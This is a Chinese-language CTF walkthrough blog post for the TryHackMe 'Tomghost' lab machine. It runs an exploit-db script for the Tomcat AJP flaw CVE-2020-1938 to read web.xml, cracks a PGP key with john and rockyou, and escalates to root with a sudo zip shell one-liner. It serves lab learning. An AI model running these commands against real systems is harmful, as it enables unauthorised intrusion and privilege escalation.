CTF靶机 Tomghost 笔记

Tomghost

靶机介绍 : 识别最近的漏洞,试图利用系统或读取您不应该访问的文件
靶机标签 : Tomcat, sudo zip提权, pgp, CVE-2020-1938

目标机ip:10.10.218.159
攻击机:kali
Nmap 扫描目标机端口
开放了22,53,8009,8080端口

nmap -sV 10.10.218.159

在这里插入图片描述
访问8080端口,Apache Tomcat/9.0.30
在这里插入图片描述
在exploit-db上搜索对应CVE
在这里插入图片描述
下载EXP利用
在这里插入图片描述
下载后记得赋予执行权限

python./48143.py 10.10.218.159 -p 8009 -f WEB-INF/web.xml

注意到回显页面有一个账号密码
在这里插入图片描述
ssh登录到目标机
在这里插入图片描述进到里面先到处翻一翻
查看另一用户merlin的home目录
发现第一个第一个flag user.txt
在这里插入图片描述
skyfuck用户目录下有两个加密文件
tryhackme.asc
credential.pgp
用scp 下载文件到攻击机破解

scp skyfuck@10.10.218.159:tryhackme.asc /root/
scp skyfuck@10.10.218.159:credential.pgp /root/

在这里插入图片描述下载到kali攻击机后用gpg2john 获取tryhackme.asc 的hash

gpg2john tryhackme.asc > hash

在这里插入图片描述用jhon破解破解hash

john -w=/usr/share/wordlists/rockyou.txt hash

在这里插入图片描述用gpg 导入tryhackme.asc
会弹出一个框需要验证密码, 键入john跑出来的tryhackme.asc密码登录

gpg --import tryhackme.asc

后面解密credential.pgp的时候还需要输入一次密码
获得merlin用户的账号与密码

gpg --decrypt credential.pgp

在这里插入图片描述用ssh登录merlin用户
在这里插入图片描述先查看sudo权限
能用zip 提权
参考链接: https://gtfobins.github.io/
在这里插入图片描述

提权成功, 查看root文件

TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'

在这里插入图片描述
END

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值